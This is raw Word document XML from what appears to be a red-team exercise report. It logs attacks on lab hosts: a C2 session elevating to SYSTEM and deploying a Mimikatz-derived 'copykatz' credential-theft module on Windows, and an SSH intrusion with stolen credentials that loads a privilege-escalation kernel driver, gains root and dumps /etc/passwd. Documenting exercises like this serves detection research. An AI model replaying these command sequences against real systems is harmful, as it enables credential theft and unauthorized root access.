          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Copykatz module (Mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0568DA2A" w14:textId="6AA0226C" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_hberui1fyc9m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="22" w:name="_Toc12600003"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="228621E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4:37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECF479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Benign activity opened Firefox and browsed to http://128.55.12.233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F9B622" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CD072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4:37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297291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 New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11639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windows] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0225EC0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Initializing new windows console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC720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 NEW CONSOLE READY [W2] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B104EB1" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA7B15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MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4B010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W2         128.55.12.76:49782 --&gt;   128.55.12.233:443   [HTTP]  Wed May  8 14:37:35 2019        active 9s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3772C91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W1         128.55.12.77:51258 --&gt;   128.55.12.233:443   [HTTP]  Wed May  8 12:58:02 2019        DEAD 1843s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4999AB68" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2751A12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4:38 whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019F3B7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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA15B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2&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF9EC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pid: 8412</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADB8F1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2&gt;elevatepid '\\.\perfmon' 8412</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E1C4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levate process [\\.\perfmon] [8412]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60EC4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levate success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5510A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2&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736C744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SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B524F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2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A576CCD" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26F5A4E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4:40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C30C4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2&gt;module copykatz /e5/deploy/copykatz.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB9DC2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2&gt;module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3F830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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7592B2F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   name   | library                             | deployed |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E82DC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413218B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 copykatz | /e5/deploy/copykatz.windows.x64.dll |    0     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39EB1F5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1F086F" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D932F0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4:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32806C9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2&gt;deploy copykatz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D3EF6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Loading module /e5/deploy/copykatz.windows.x64.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7492E0A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deploy success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C1825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2&gt;[*] register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B33B5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register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F9829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register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C13442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register success [copykatz] [/e5/deploy/copykatz.windows.x64.dll]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A64A8" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27646EB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4:41</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8AC6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lastRenderedPageBreak/>
        <w:t>W2&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB25F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C:\Program Files\mozilla\firefox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ED3FB0" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B1288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4:42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6D1BA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2&gt;cd C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CB00F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Unhandled Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F0735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Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184F319" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="546EC58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4:46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D5FE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CTRL+C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875FFA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C[-] Connection lost for console [W2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DDB3D6" w14:textId="3C064057" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_69e7sx3aaqt" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="24" w:name="_Toc12600004"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>14:54 -- TA5.2 Ubuntu 1 -- SSH BinFmt-Elevate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="2148F07C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Copied files via SCP and connected via SSH from the ta1-pivot-2 host.  Sent files to the target included the privilege escalation driver load_helper and an elevate client.  Connected to target using SSH with stolen credentials.  Loaded the driver, and used it to gain root privileges.  As root, exfil’d /etc/passwd, /etc/shadow, and the admin’s home directory Documents files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A949AD6" w14:textId="1F79C567" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_335s6ce7siks" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="26" w:name="_Toc12600005"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="0204BF04" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta51-pivot-2</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128.55.12.233</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B20A392" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>ta52-ubuntu-1</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128.55.12.78</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Ubuntu 14.04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2FC478" w14:textId="6A2B1468" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_eduym63ot4td" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="28" w:name="_Toc12600006"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="09913BC7" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF0627" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>load_helper driver (Elevate driver, bin_fmt method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8BDD3D" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>mchk client (Elevate client, bin_fmt method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3232E" w14:textId="58EAE5CA" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_m8vy8midylbu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="30" w:name="_Toc12600007"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="2F599A7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4:54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B88942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ed May  8 14:53:00 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A7DDA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root@ta51-pivot-2:/e5/elevate_binfmt_linux# scp mchk admin@128.55.12.78:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF02350" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A87C2B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4:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05462D6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root@ta51-pivot-2:/e5/elevate_binfmt_linux# scp load_helper.ko admin@128.55.12.78:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70491F29" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="403D581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4:55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68348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root@ta51-pivot-2:/e5/elevate_binfmt_linux# ssh admin@128.55.12.78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B318C6" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35CA2A9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4:56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0A15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dmin@ta52-ubuntu-1:~$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CA998B" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C71248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4:57</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B93A11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dmin@ta52-ubuntu-1:~$ sudo insmod ./load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996E85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sudo] password for admin: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5BF8F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insmod: ERROR: could not insert module ./load_helper.ko: Invalid module format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A1D41" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DF1091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dmin@ta52-ubuntu-1:~$ dmesg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F5FC2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81134.542133] load_helper: disagrees about version of symbol module_layout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D79E11" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37D7BE9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5:00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB8154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dmin@ta52-ubuntu-1:~$ uname -r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33151DE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4.4.0-31-generic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C283FD1" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F25112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5:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1042B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dmin@ta52-ubuntu-1:~$ rm load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DD154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dmin@ta52-ubuntu-1:~$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85ABEB" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0521248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5:05</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6382ED7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lastRenderedPageBreak/>
        <w:t>root@ta51-pivot-2:/e5/elevate_binfmt_linux# scp load_helper.ko admin@128.55.12.78:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DCBE54" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7E7D0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5:06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528F273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root@ta51-pivot-2:/e5/elevate_binfmt_linux# ssh admin@128.55.12.78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E07997" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A5856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5:06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FC6BD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dmin@ta52-ubuntu-1:~$ sudo insmod ./load_helper.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC19DED" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AD454E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5:06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC9160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admin@ta52-ubuntu-1:~$ ./mchk </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135EDFA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root@ta52-ubuntu-1:~# cd /etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B73D6C" w14:textId="77777777" w:rsidR="00FC027E" w:rsidRPr="00FC027E" w:rsidRDefault="00FC027E" w:rsidP="00FC027E">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BC28B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5:07</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7284B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root@ta52-ubuntu-1:/etc# cat passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5B307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root:x:0:0:root:/root:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475EE4A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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75AC1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bin:x:2:2:bin:/bin:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2357994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ys:x:3:3:sys:/dev:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A088C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ync:x:4:65534:sync:/bin:/bin/sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ACB69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games:x:5:60:games:/usr/games:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E515B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man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667F186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p:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D7D1C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mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5696A4A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news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C37050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uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C8315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proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1983C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ww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E1A42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backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063B98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ist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD204F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irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015D1D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gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3020424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nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C875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ibuuid:x:100:101::/var/lib/libuuid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70003E9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yslog:x:101:104::/home/syslog:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546DEC9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messagebus:x:102:106::/var/run/dbus:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181B211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andscape:x:103:109::/var/lib/landscape:/bin/false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D087C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shd:x:104:65534::/var/run/sshd:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F6C2A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darpa:x:1000:1000:darpa,,,:/home/darpa:/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0295575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usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false</w:t>
      </w:r>
    </w:p>
